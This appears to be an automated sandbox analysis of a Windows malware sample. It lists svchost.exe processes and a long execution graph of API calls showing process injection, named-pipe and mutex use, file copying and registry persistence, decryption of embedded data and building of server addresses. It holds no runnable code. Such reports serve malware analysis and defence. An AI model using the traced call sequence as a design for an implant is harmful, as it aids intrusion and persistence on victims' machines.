                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:23
                                                                                                                                                                              Start time:07:27:38
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:07:27:59
                                                                                                                                                                              Start date:15/09/2023
                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                              Imagebase:0x1230000
                                                                                                                                                                              File size:44'520 bytes
                                                                                                                                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:13%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:38.5%
                                                                                                                                                                                Signature Coverage:19.9%
                                                                                                                                                                                Total number of Nodes:1875
                                                                                                                                                                                Total number of Limit Nodes:34
                                                                                                                                                                                execution_graph 11537 120d2a3 11538 120d2af ___scrt_is_nonwritable_in_current_image 11537->11538 11562 120db1d 11538->11562 11540 120d2b6 11542 120d2df 11540->11542 11596 120d5ca IsProcessorFeaturePresent 11540->11596 11547 120d31e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 11542->11547 11573 120ca74 11542->11573 11545 120ca18 _abort 5 API calls 11545->11547 11546 120d2fe ___scrt_is_nonwritable_in_current_image 11551 120d37e 11547->11551 11600 120bcd1 11547->11600 11549 120d384 11581 1203850 11549->11581 11577 120d6e5 11551->11577 11563 120db26 11562->11563 11607 120d426 IsProcessorFeaturePresent 11563->11607 11567 120db37 11572 120db3b 11567->11572 11618 120f487 11567->11618 11569 120db52 11569->11540 11572->11540 11575 120ca8b 11573->11575 11574 120d415 _ValidateLocalCookies 5 API calls 11576 120cab5 11574->11576 11575->11574 11576->11545 11576->11546 11752 120ded0 11577->11752 11579 120d6f8 GetStartupInfoW 11580 120d70b 11579->11580 11580->11549 11754 12135bf 11581->11754 11583 12038d1 11764 12144cb 11583->11764 11587 1203959 11779 1213990 11587->11779 11589 12039a0 11783 1204b10 11589->11783 11591 1203b01 ExitProcess 11592 12039dc 11592->11591 11593 1203aaa 11592->11593 11787 1213b75 11592->11787 11593->11591 11597 120d5e0 ___scrt_get_show_window_mode 11596->11597 11598 120d688 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11597->11598 11599 120d6d2 11598->11599 11599->11540 11601 120bcf9 try_get_function 11600->11601 11602 120cebf _abort 11600->11602 11601->11551 11603 1209c76 _abort 35 API calls 11602->11603 11606 120ced0 11603->11606 11604 120a5ae _abort 35 API calls 11605 120cefa 11604->11605 11606->11604 11608 120d44c 11607->11608 11609 120e754 11608->11609 11610 120e759 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 11609->11610 11629 120e968 11610->11629 11614 120e76f 11615 120e77a 11614->11615 11643 120e9a4 11614->11643 11615->11567 11617 120e767 11617->11567 11684 120ff45 11618->11684 11621 120e77d 11622 120e786 11621->11622 11623 120e797 11621->11623 11624 120e94d ___vcrt_uninitialize_ptd 6 API calls 11622->11624 11623->11572 11625 120e78b 11624->11625 11626 120e9a4 ___vcrt_uninitialize_locks DeleteCriticalSection 11625->11626 11627 120e790 11626->11627 11748 120ec25 11627->11748 11630 120e971 11629->11630 11632 120e99a 11630->11632 11634 120e763 11630->11634 11647 120eba5 11630->11647 11633 120e9a4 ___vcrt_uninitialize_locks DeleteCriticalSection 11632->11633 11633->11634 11634->11617 11635 120e91a 11634->11635 11665 120eaf4 11635->11665 11637 120e924 11638 120e92f 11637->11638 11670 120eb68 11637->11670 11638->11614 11640 120e93d 11641 120e94a 11640->11641 11675 120e94d 11640->11675 11641->11614 11644 120e9ce 11643->11644 11645 120e9af 11643->11645 11644->11617 11646 120e9b9 DeleteCriticalSection 11645->11646 11646->11644 11646->11646 11652 120e9d3 11647->11652 11649 120ebbf 11650 120ebdc InitializeCriticalSectionAndSpinCount 11649->11650 11651 120ebc8 11649->11651 11650->11651 11651->11630 11653 120ea03 11652->11653 11654 120ea07 try_get_function 11652->11654 11653->11654 11657 120ea27 11653->11657 11658 120ea73 11653->11658 11654->11649 11656 120ea33 GetProcAddress 11656->11654 11657->11654 11657->11656 11659 120ea90 11658->11659 11660 120ea9b LoadLibraryExW 11658->11660 11659->11653 11661 120eab7 GetLastError 11660->11661 11664 120eacf 11660->11664 11662 120eac2 LoadLibraryExW 11661->11662 11661->11664 11662->11664 11663 120eae6 FreeLibrary 11663->11659 11664->11659 11664->11663 11666 120e9d3 try_get_function 5 API calls 11665->11666 11667 120eb0e 11666->11667 11668 120eb26 TlsAlloc 11667->11668 11669 120eb17 11667->11669 11669->11637 11671 120e9d3 try_get_function 5 API calls 11670->11671 11672 120eb82 11671->11672 11673 120eb9c TlsSetValue 11672->11673 11674 120eb91 11672->11674 11673->11674 11674->11640 11676 120e957 11675->11676 11678 120e95d 11675->11678 11679 120eb2e 11676->11679 11678->11638 11680 120e9d3 try_get_function 5 API calls 11679->11680 11681 120eb48 11680->11681 11682 120eb54 11681->11682 11683 120eb5f TlsFree 11681->11683 11682->11678 11683->11682 11685 120ff62 11684->11685 11688 120ff5e 11684->11688 11685->11688 11690 120fec3 11685->11690 11686 120d415 _ValidateLocalCookies 5 API calls 11687 120db44 11686->11687 11687->11569 11687->11621 11688->11686 11691 120fecf ___scrt_is_nonwritable_in_current_image 11690->11691 11702 120aef5 EnterCriticalSection 11691->11702 11693 120fed6 11703 120fb7e 11693->11703 11695 120fee5 11701 120fef4 11695->11701 11714 120fd57 GetStartupInfoW 11695->11714 11699 120ff05 ___scrt_is_nonwritable_in_current_image 11699->11685 11725 120ff10 11701->11725 11702->11693 11704 120fb8a ___scrt_is_nonwritable_in_current_image 11703->11704 11705 120fb97 11704->11705 11706 120fbae 11704->11706 11708 120951c __dosmaperr 20 API calls 11705->11708 11728 120aef5 EnterCriticalSection 11706->11728 11710 120fb9c ___scrt_is_nonwritable_in_current_image _abort 11708->11710 11709 120fbba 11713 120fbe6 11709->11713 11729 120facf 11709->11729 11710->11695 11736 120fc0d 11713->11736 11715 120fd74 11714->11715 11717 120fe06 11714->11717 11716 120fb7e 21 API calls 11715->11716 11715->11717 11718 120fd9d 11716->11718 11720 120fe0d 11717->11720 11718->11717 11719 120fdcb GetFileType 11718->11719 11719->11718 11721 120fe14 11720->11721 11722 120fe57 GetStdHandle 11721->11722 11723 120febf 11721->11723 11724 120fe6a GetFileType 11721->11724 11722->11721 11723->11701 11724->11721 11747 120af3d LeaveCriticalSection 11725->11747 11727 120ff17 11727->11699 11728->11709 11730 120a5f1 __dosmaperr 20 API calls 11729->11730 11733 120fae1 11730->11733 11731 120faee 11732 120a64e _free 20 API calls 11731->11732 11734 120fb40 11732->11734 11733->11731 11739 120a8fa 11733->11739 11734->11709 11746 120af3d LeaveCriticalSection 11736->11746 11738 120fc14 11738->11710 11740 120a688 __dosmaperr 5 API calls 11739->11740 11741 120a921 11740->11741 11742 120a93f InitializeCriticalSectionAndSpinCount 11741->11742 11743 120a92a 11741->11743 11742->11743 11744 120d415 _ValidateLocalCookies 5 API calls 11743->11744 11745 120a956 11744->11745 11745->11733 11746->11738 11747->11727 11749 120ec2e 11748->11749 11750 120ec54 11748->11750 11749->11750 11751 120ec3e FreeLibrary 11749->11751 11750->11623 11751->11749 11753 120dee7 11752->11753 11753->11579 11753->11753 11755 1213618 11754->11755 11759 1213714 11754->11759 11756 1213625 11755->11756 11755->11759 11791 12033bc 11756->11791 11758 121364c 11797 1201000 11758->11797 11759->11583 11761 121367c 11803 1213839 11761->11803 11765 1214680 11764->11765 11766 121451a VirtualAlloc 11764->11766 11767 1214c3e LeaveCriticalSection 11765->11767 11771 120391b 11765->11771 11769 1214600 11766->11769 11773 1214718 11767->11773 11821 1203120 11769->11821 11775 121310f 11771->11775 11772 1214c3e LeaveCriticalSection 11772->11773 11773->11771 11773->11772 11774 12147e7 GetLastError 11773->11774 11774->11771 11774->11773 11777 1213179 11775->11777 11776 12133c5 CreateNamedPipeA 11778 1213229 11776->11778 11777->11776 11777->11777 11777->11778 11778->11587 11780 1213a3b 11779->11780 11782 12139ca 11779->11782 11781 1214fcb DeleteCriticalSection 11780->11781 11780->11782 11781->11782 11782->11589 11784 1204b62 11783->11784 11785 1204b7e 11783->11785 11784->11785 11786 1204e5b HeapWalk GetProcessHeap 11784->11786 11785->11592 11786->11785 11788 1203aa1 11787->11788 11789 1213ba6 11787->11789 11788->11591 11789->11788 11831 596000 GetPEB 11789->11831 11792 12034b6 11791->11792 11793 1203410 11791->11793 11792->11758 11793->11792 11809 1214fcb 11793->11809 11798 1201047 11797->11798 11799 1201253 11798->11799 11800 1201110 11798->11800 11801 12011c2 GetModuleHandleA GetModuleFileNameA GetModuleFileNameA EnterCriticalSection 11798->11801 11799->11800 11802 1201272 GetSystemTime ConnectNamedPipe 11799->11802 11800->11761 11801->11799 11801->11801 11802->11799 11804 1213946 11803->11804 11805 121387b 11803->11805 11807 121395b CreateMutexA 11804->11807 11808 12136db 11804->11808 11806 12138ee InitializeCriticalSection ConnectNamedPipe 11805->11806 11805->11808 11806->11808 11807->11808 11808->11759 11810 121500f 11809->11810 11811 120348a 11809->11811 11810->11811 11817 1203c9c 11810->11817 11813 1214c3e 11811->11813 11814 1214ca2 11813->11814 11816 1214c71 11813->11816 11815 1214caa LeaveCriticalSection 11814->11815 11814->11816 11815->11816 11816->11792 11819 1203cc9 11817->11819 11818 1203ce7 11818->11811 11819->11818 11820 1203d3f DeleteCriticalSection 11819->11820 11820->11819 11822 1203361 11821->11822 11824 120315a 11821->11824 11823 1203366 SetNamedPipeHandleState 11822->11823 11826 12031e6 11822->11826 11823->11826 11827 12035f7 11824->11827 11826->11771 11828 1203663 11827->11828 11830 120364d 11827->11830 11828->11826 11829 12037c4 ReleaseMutex SetNamedPipeHandleState 11829->11830 11830->11828 11830->11829 11832 596059 11831->11832 11833 5961fd VirtualAlloc 11832->11833 11838 5960e0 11832->11838 11841 596ae1 11833->11841 11835 596257 VirtualAlloc 11837 596297 11835->11837 11836 59634d LoadLibraryA 11836->11837 11837->11836 11839 5963be 11837->11839 11838->11788 11845 5d3b00 11839->11845 11842 596b0f 11841->11842 11844 596b0a 11841->11844 11888 596644 11842->11888 11844->11835 11846 5d3b0d 11845->11846 11899 5d2ed0 11846->11899 11848 5d3b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 11902 5d4510 11848->11902 11850 5d400a ExitProcess 11851 5d3b54 11851->11850 11920 5d5700 11851->11920 11855 5d3b9f 11954 5d9400 11855->11954 11861 5d3be1 11971 5d5e00 CreateMutexA GetLastError 11861->11971 11863 5d3beb StrStrIA 11972 5d1120 11863->11972 11874 5d3c92 12020 5d5b50 11874->12020 11878 5d3df8 11883 5d3e30 11878->11883 12060 5d78d0 11878->12060 11881 5d3fed Sleep 11881->11883 11882 5d4020 257 API calls 11882->11883 11883->11881 11883->11882 11886 5d3f09 11883->11886 12047 5d7970 11883->12047 11886->11883 11887 5d3f62 VirtualFree 11886->11887 12064 5d42e0 11886->12064 12069 5d4020 11886->12069 11887->11886 11889 596658 11888->11889 11890 596670 11889->11890 11892 596c01 11889->11892 11890->11844 11893 596c28 11892->11893 11895 596c42 11893->11895 11896 596b8a 11893->11896 11895->11890 11897 596b95 RtlAllocateHeap 11896->11897 11898 596bad 11897->11898 11898->11895 12092 5d3090 GetPEB 11899->12092 11901 5d2edf 11901->11848 11903 5d47e6 11902->11903 11904 5d4528 11902->11904 11903->11851 11904->11903 11905 5d455b GetModuleFileNameA CreateFileA 11904->11905 11905->11903 11906 5d45a4 GetFileSize 11905->11906 11907 5d45c6 VirtualAlloc 11906->11907 11908 5d47d0 11906->11908 11907->11908 11909 5d45ef ReadFile 11907->11909 11908->11903 11910 5d47d9 CloseHandle 11908->11910 11911 5d4625 11909->11911 11916 5d466f 11909->11916 11910->11903 11912 5d4637 FindCloseChangeNotification 11911->11912 11911->11916 12093 5d47f0 11912->12093 11913 5d47b2 VirtualFree 11913->11908 11916->11908 11916->11913 11917 5d4681 VirtualFree 11919 5d469f 11917->11919 11918 5d47f0 15 API calls 11918->11919 11919->11916 11919->11918 11921 5d5717 11920->11921 11922 5d3b84 11920->11922 12113 5d8f80 11921->12113 11941 5d5a00 11922->11941 11928 5d5773 12182 5d5cd0 11928->12182 11931 5d57d1 11932 5d57f9 GetEnvironmentVariableA 11931->11932 11933 5d57e6 GetAllUsersProfileDirectoryA 11931->11933 11934 5d5810 wnsprintfA CreateFileA 11932->11934 11933->11934 11934->11922 11935 5d5867 GetFileSize 11934->11935 11936 5d5918 FindCloseChangeNotification 11935->11936 11937 5d5886 VirtualAlloc 11935->11937 11936->11922 11937->11936 11938 5d58ab ReadFile 11937->11938 11939 5d5904 VirtualFree 11938->11939 11940 5d58e4 11938->11940 11939->11936 11940->11936 11942 5d5b44 11941->11942 11943 5d5a18 11941->11943 11942->11855 11943->11942 11944 5d5a3a lstrcpyA 11943->11944 12207 5d5930 11944->12207 11946 5d5a62 11947 5d5a74 lstrlenA 11946->11947 11947->11942 11948 5d5a8c lstrcpyA lstrlenA lstrlenA 11947->11948 11948->11942 11949 5d5abf lstrcatA RegCreateKeyExA 11948->11949 11950 5d5b0a RegCloseKey 11949->11950 11951 5d5b16 11949->11951 11952 5d5b37 lstrlenA 11950->11952 11953 5d5b25 lstrcpyA 11951->11953 11952->11942 11953->11952 11955 5d3bcf 11954->11955 11958 5d941a 11954->11958 11960 5d99f0 GetCurrentProcess OpenProcessToken 11955->11960 11958->11955 11959 5d9502 lstrcpyA CharUpperA 11958->11959 12211 5d8bb0 11958->12211 12227 5d9650 11958->12227 11959->11958 11961 5d9a1f GetTokenInformation 11960->11961 11964 5d3bd7 11960->11964 11962 5d9b76 CloseHandle 11961->11962 11963 5d9a50 GetTokenInformation 11961->11963 11962->11964 11963->11962 11965 5d9a85 CreateWellKnownSid EqualSid 11963->11965 11969 5d6060 GetModuleFileNameA 11964->11969 11965->11964 11966 5d9ad4 CreateWellKnownSid EqualSid 11965->11966 11966->11964 11967 5d9b0a CreateWellKnownSid EqualSid 11966->11967 11967->11964 11968 5d9b40 CreateWellKnownSid EqualSid 11967->11968 11968->11962 11968->11964 11970 5d6091 11969->11970 11970->11861 11971->11863 11973 5d1289 11972->11973 11974 5d113a 11972->11974 11988 5d5e30 11973->11988 11974->11973 11975 5d1144 lstrlenA 11974->11975 11975->11973 11976 5d1156 lstrlenA 11975->11976 11976->11973 11977 5d1168 11976->11977 11978 5d118a GetEnvironmentVariableA 11977->11978 11979 5d1177 GetAllUsersProfileDirectoryA 11977->11979 11980 5d11a1 wnsprintfA lstrcmpiA 11978->11980 11979->11980 11981 5d11db 11980->11981 11982 5d1216 11980->11982 11981->11982 11983 5d11e3 CopyFileA SetFileAttributesA lstrcpyA 11981->11983 12236 5d97a0 GetProcessHeap RtlAllocateHeap 11982->12236 11983->11982 11985 5d1220 lstrcpyA lstrcpyA CreateThread 11985->11973 11986 5d12a3 11985->11986 12237 5d12d0 11985->12237 11987 5d97c0 2 API calls 11986->11987 11987->11973 11989 5d5e5d 11988->11989 11990 5d5e64 RegOpenKeyExA 11988->11990 11989->11990 11991 5d5e8c RegQueryValueExA 11990->11991 11992 5d3c39 11990->11992 11993 5d5edc 11991->11993 11994 5d5ebc 11991->11994 11999 5d6cf0 11992->11999 11995 5d5f15 RegCloseKey 11993->11995 12243 5d9bd0 11993->12243 11994->11993 11996 5d5ece RegDeleteValueA 11994->11996 11995->11992 11996->11993 12000 5d6d0c 11999->12000 12001 5d6d13 RegOpenKeyExA 11999->12001 12000->12001 12002 5d3c4d 12001->12002 12003 5d6d3a RegQueryValueExA 12001->12003 12006 5d5f30 12002->12006 12004 5d6d84 RegCloseKey 12003->12004 12005 5d6d70 RegDeleteValueA 12003->12005 12004->12002 12005->12004 12247 5d7d20 12006->12247 12009 5d5f99 RegOpenKeyExA 12011 5d3c58 12009->12011 12012 5d5fc1 RegQueryValueExA 12009->12012 12010 5d5f92 12010->12009 12017 5d9b90 12011->12017 12013 5d5ffc 12012->12013 12014 5d6041 RegCloseKey 12013->12014 12015 5d9bd0 QueryPerformanceCounter 12013->12015 12014->12011 12016 5d6020 RegSetValueExA 12015->12016 12016->12014 12018 5d3c71 WSAStartup 12017->12018 12019 5d9ba0 QueryPerformanceCounter 12017->12019 12018->11850 12018->11874 12019->12018 12021 5d3dac 12020->12021 12022 5d5b67 12020->12022 12034 5d8a70 12021->12034 12022->12021 12023 5d5b7b lstrlenA lstrlenA 12022->12023 12024 5d5ba3 12023->12024 12025 5d5bab StrStrIA 12024->12025 12026 5d5be0 VirtualAlloc 12024->12026 12025->12024 12027 5d5bdc 12025->12027 12026->12021 12028 5d5c09 12026->12028 12027->12026 12029 5d5c1f StrStrIA 12028->12029 12030 5d5c7f 12028->12030 12029->12030 12032 5d5c39 lstrcpynA 12029->12032 12030->12021 12031 5d5c91 VirtualAlloc 12030->12031 12031->12021 12033 5d5cad 12031->12033 12032->12028 12033->12021 12035 5d8a87 12034->12035 12036 5d8ba3 12034->12036 12035->12036 12037 5d8ab9 CryptAcquireContextA 12035->12037 12036->11878 12038 5d8add GetLastError 12037->12038 12039 5d8b12 12037->12039 12040 5d8aef 12038->12040 12041 5d8af8 CryptAcquireContextA 12038->12041 12039->12036 12042 5d8b1c CryptImportKey 12039->12042 12040->12039 12040->12041 12041->12039 12043 5d8b97 CryptReleaseContext 12042->12043 12044 5d8b41 CryptImportKey 12042->12044 12043->12036 12045 5d8b8d CryptDestroyKey 12044->12045 12046 5d8b68 CryptDecrypt CryptDestroyKey 12044->12046 12045->12043 12046->12045 12048 5d7ae9 12047->12048 12049 5d7987 VirtualAlloc 12047->12049 12048->11883 12049->12048 12050 5d79b6 12049->12050 12249 5da400 12050->12249 12052 5d7ad8 VirtualFree 12052->12048 12054 5d8a70 9 API calls 12055 5d7a15 12054->12055 12055->12052 12056 5d7a20 VirtualAlloc 12055->12056 12056->12052 12058 5d7a5a 12056->12058 12057 5d7ad0 12057->12052 12058->12057 12059 5d7a89 inet_ntoa wnsprintfA 12058->12059 12059->12058 12061 5d78e4 12060->12061 12062 5d7965 12060->12062 12061->12062 12063 5d7927 inet_ntoa wnsprintfA 12061->12063 12062->11883 12063->12061 12065 5d42fa VirtualAlloc 12064->12065 12066 5d44fd 12064->12066 12065->12066 12067 5d44a3 12065->12067 12066->11886 12067->12066 12256 5d92e0 12067->12256 12070 5d42d7 12069->12070 12071 5d4034 12069->12071 12070->11886 12071->12070 12072 5d405f InitializeCriticalSection CreateEventA 12071->12072 12073 5d409f 12072->12073 12074 5d42cd DeleteCriticalSection 12073->12074 12075 5d40ab EnterCriticalSection 12073->12075 12074->12070 12076 5d40bb VirtualFree 12075->12076 12077 5d40da 12075->12077 12076->12077 12078 5d40e0 TerminateThread 12077->12078 12079 5d40f3 ResetEvent LeaveCriticalSection CreateThread 12077->12079 12078->12079 12264 5d97a0 GetProcessHeap RtlAllocateHeap 12079->12264 12318 5d4ac0 12079->12318 12081 5d413a 12082 5d4221 WaitForMultipleObjects WaitForSingleObject 12081->12082 12090 5d41d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 12081->12090 12083 5d424f WaitForSingleObject 12082->12083 12084 5d424b 12082->12084 12085 5d4267 TerminateThread 12083->12085 12086 5d4273 EnterCriticalSection 12083->12086 12084->12083 12085->12086 12087 5d4283 VirtualFree 12086->12087 12088 5d42a2 LeaveCriticalSection 12086->12088 12087->12088 12089 5d97c0 2 API calls 12088->12089 12091 5d42bb 12089->12091 12090->12081 12265 5d4ba0 CoInitialize 12090->12265 12091->12074 12092->11901 12094 5d4665 12093->12094 12095 5d4807 12093->12095 12094->11916 12094->11917 12094->11919 12095->12094 12096 5d4814 CryptAcquireContextA 12095->12096 12097 5d4834 GetLastError 12096->12097 12100 5d4856 12096->12100 12098 5d4841 CryptAcquireContextA 12097->12098 12097->12100 12098->12100 12099 5d4a9f CryptReleaseContext 12099->12094 12100->12094 12100->12099 12101 5d48be CryptCreateHash 12100->12101 12102 5d48f9 CryptHashData 12101->12102 12103 5d4a90 12101->12103 12104 5d4919 CryptDeriveKey 12102->12104 12105 5d4a83 CryptDestroyHash 12102->12105 12103->12099 12104->12105 12106 5d494a CryptDecrypt CryptDestroyKey 12104->12106 12105->12103 12106->12105 12107 5d4995 CryptCreateHash 12106->12107 12107->12105 12108 5d49b7 CryptHashData 12107->12108 12109 5d49da CryptGetHashParam 12108->12109 12110 5d4a76 CryptDestroyHash 12108->12110 12109->12110 12111 5d4a11 CryptGetHashParam 12109->12111 12110->12105 12111->12110 12112 5d4a3e 12111->12112 12112->12110 12114 5d572e GetModuleFileNameA 12113->12114 12115 5d8f9a 12113->12115 12153 5d1ca0 CreateToolhelp32Snapshot 12114->12153 12115->12114 12116 5d8fed GetVersionExA 12115->12116 12117 5d9005 GetSystemInfo 12116->12117 12118 5d9266 12116->12118 12120 5d901c 12117->12120 12121 5d9115 12117->12121 12118->12114 12119 5d926c lstrcatA 12118->12119 12119->12114 12123 5d9025 lstrcatA 12120->12123 12124 5d9042 12120->12124 12122 5d9110 12121->12122 12125 5d912b 12121->12125 12126 5d9174 12121->12126 12192 5d9290 GetModuleHandleA GetProcAddress 12122->12192 12123->12122 12128 5d9068 12124->12128 12129 5d904b lstrcatA 12124->12129 12132 5d914e 12125->12132 12133 5d9134 lstrcatA 12125->12133 12130 5d917d 12126->12130 12131 5d91c3 12126->12131 12128->12122 12135 5d90a1 GetSystemMetrics 12128->12135 12143 5d9087 lstrcatA 12128->12143 12129->12122 12136 5d9186 lstrcatA 12130->12136 12137 5d91a0 12130->12137 12131->12122 12147 5d91ef 12131->12147 12148 5d91d5 lstrcatA 12131->12148 12132->12122 12138 5d9157 lstrcatA 12132->12138 12133->12122 12144 5d90ad lstrcatA 12135->12144 12145 5d90c7 GetSystemMetrics 12135->12145 12136->12122 12137->12122 12146 5d91a9 lstrcatA 12137->12146 12138->12122 12139 5d9219 lstrcatA 12140 5d9228 lstrlenA 12139->12140 12141 5d9259 lstrlenA 12140->12141 12142 5d9239 lstrcatA lstrcatA 12140->12142 12141->12118 12142->12141 12143->12122 12144->12122 12149 5d90ed 12145->12149 12150 5d90d3 lstrcatA 12145->12150 12146->12122 12147->12122 12151 5d91f8 lstrcatA 12147->12151 12148->12122 12149->12122 12152 5d90f8 lstrcatA 12149->12152 12150->12122 12151->12122 12152->12122 12154 5d1cc9 Process32First 12153->12154 12155 5d1e51 12153->12155 12156 5d1cee GetCurrentProcessId 12154->12156 12157 5d1e44 CloseHandle 12154->12157 12171 5d9d20 12155->12171 12158 5d1d04 12156->12158 12157->12155 12159 5d1d20 Process32Next 12158->12159 12160 5d1d12 12158->12160 12159->12158 12159->12160 12160->12157 12161 5d1d44 Process32First 12160->12161 12161->12157 12162 5d1d5f 12161->12162 12163 5d1e29 Process32Next 12162->12163 12164 5d1d71 lstrlenA 12162->12164 12163->12157 12163->12162 12165 5d1e27 12164->12165 12166 5d1d87 lstrcpyA OpenProcess 12164->12166 12165->12157 12166->12165 12167 5d1dbb EnumProcessModules 12166->12167 12168 5d1de5 GetModuleFileNameExA 12167->12168 12169 5d1e02 GetProcessImageFileNameA 12167->12169 12170 5d1e16 FindCloseChangeNotification 12168->12170 12169->12170 12170->12165 12172 5d9f5d 12171->12172 12173 5d9d37 12171->12173 12172->11928 12173->12172 12174 5d9d4b GetSystemDirectoryA 12173->12174 12174->12172 12175 5d9da8 GetVolumeInformationA 12174->12175 12175->12172 12176 5d9deb 12175->12176 12195 5d9f70 12176->12195 12180 5d9f0c WideCharToMultiByte lstrcpynA 12181 5d9f50 CoTaskMemFree 12180->12181 12181->12172 12183 5d579d lstrcpyA 12182->12183 12184 5d5ce7 lstrlenA 12182->12184 12183->11931 12184->12183 12185 5d5cfa CreateFileA 12184->12185 12185->12183 12186 5d5d23 GetFileSize 12185->12186 12187 5d5d9f FindCloseChangeNotification 12186->12187 12188 5d5d38 VirtualAlloc 12186->12188 12187->12183 12188->12187 12189 5d5d54 ReadFile 12188->12189 12190 5d5d8e VirtualFree 12189->12190 12191 5d5d7b 12189->12191 12190->12187 12191->12190 12193 5d92bd GetCurrentProcess 12192->12193 12194 5d9215 12192->12194 12193->12194 12194->12139 12194->12140 12196 5d9e2d StringFromCLSID 12195->12196 12197 5d9f87 12195->12197 12196->12180 12196->12181 12197->12196 12203 5d97a0 GetProcessHeap RtlAllocateHeap 12197->12203 12199 5d9fb2 12199->12196 12200 5d9fc8 GetAdaptersInfo 12199->12200 12202 5d9ff4 12200->12202 12204 5d97c0 12202->12204 12203->12199 12205 5d97dc 12204->12205 12206 5d97c9 GetProcessHeap RtlFreeHeap 12204->12206 12205->12196 12206->12205 12208 5d5949 12207->12208 12209 5d59f3 12207->12209 12208->12209 12210 5d59de CharUpperA 12208->12210 12209->11946 12210->12208 12212 5d8ce7 12211->12212 12213 5d8bc7 12211->12213 12212->11958 12213->12212 12214 5d8be5 CryptAcquireContextA 12213->12214 12215 5d8c3e 12214->12215 12216 5d8c09 GetLastError 12214->12216 12215->12212 12219 5d8c48 CryptCreateHash 12215->12219 12217 5d8c1b 12216->12217 12218 5d8c24 CryptAcquireContextA 12216->12218 12217->12215 12217->12218 12218->12215 12220 5d8cdb CryptReleaseContext 12219->12220 12221 5d8c63 CryptHashData 12219->12221 12220->12212 12222 5d8c7b CryptGetHashParam 12221->12222 12223 5d8cd1 CryptDestroyHash 12221->12223 12222->12223 12224 5d8ca3 12222->12224 12223->12220 12224->12223 12225 5d8cab CryptGetHashParam 12224->12225 12225->12223 12226 5d8ccb 12225->12226 12226->12223 12228 5d9667 12227->12228 12229 5d9722 12227->12229 12228->12229 12230 5d9685 lstrlenA 12228->12230 12229->11958 12234 5d9699 12230->12234 12231 5d96fd lstrlenA 12232 5d970c 12231->12232 12233 5d9715 lstrlenA 12231->12233 12232->12233 12233->12229 12234->12231 12235 5d96d4 lstrcatA lstrlenA 12234->12235 12235->12234 12236->11985 12238 5d12fc 12237->12238 12240 5d12e6 12237->12240 12239 5d131d RegOpenKeyExA 12241 5d1378 Sleep 12239->12241 12242 5d1341 lstrlenA RegSetValueExA RegCloseKey 12239->12242 12240->12238 12240->12239 12241->12240 12242->12241 12244 5d5ef6 RegSetValueExA 12243->12244 12245 5d9bda 12243->12245 12244->11995 12245->12244 12246 5d9b90 QueryPerformanceCounter 12245->12246 12246->12245 12248 5d5f58 lstrcpyA lstrcatA 12247->12248 12248->12009 12248->12010 12250 5d79d2 12249->12250 12251 5da417 12249->12251 12250->12052 12250->12054 12251->12250 12252 5da442 RegOpenKeyExA 12251->12252 12252->12250 12253 5da466 RegQueryValueExA 12252->12253 12254 5da48a 12253->12254 12255 5da490 RegCloseKey 12253->12255 12254->12255 12255->12250 12257 5d93f8 12256->12257 12258 5d92fa 12256->12258 12257->12067 12258->12257 12259 5d9304 GetLocalTime 12258->12259 12261 5d9322 12259->12261 12260 5d8bb0 9 API calls 12260->12261 12261->12257 12261->12260 12262 5d9650 5 API calls 12261->12262 12263 5d93c9 lstrcatA 12262->12263 12263->12261 12264->12081 12266 5d56f0 CoUninitialize 12265->12266 12267 5d4bc2 12265->12267 12268 5d4bd1 SetEvent 12267->12268 12269 5d4bf9 12268->12269 12269->12266 12270 5d4c28 VirtualAlloc VirtualAlloc VirtualAlloc 12269->12270 12271 5d4c10 WaitForSingleObject 12269->12271 12272 5d4c23 12270->12272 12273 5d4c8a 12270->12273 12271->12270 12271->12272 12272->12266 12273->12272 12275 5d4cc3 12273->12275 12277 5d52a2 12273->12277 12278 5d4ce5 12275->12278 12282 5d4e2c 12275->12282 12283 5d4db7 GetCurrentThreadId 12275->12283 12331 5d8370 12277->12331 12279 5d56b8 VirtualFree VirtualFree VirtualFree 12279->12272 12280 5d5354 lstrlenA lstrlenA 12280->12279 12281 5d5385 wsprintfA CryptBinaryToStringA 12280->12281 12281->12279 12284 5d53d0 MultiByteToWideChar 12281->12284 12282->12278 12286 5d4ee1 12282->12286 12287 5d4e81 GetSystemMetrics GetSystemMetrics 12282->12287 12283->12278 12350 5d17d0 12284->12350 12288 5d4f40 12286->12288 12289 5d4ef0 GlobalMemoryStatus 12286->12289 12287->12278 12288->12278 12295 5d4fdf lstrlenA 12288->12295 12296 5d5032 12288->12296 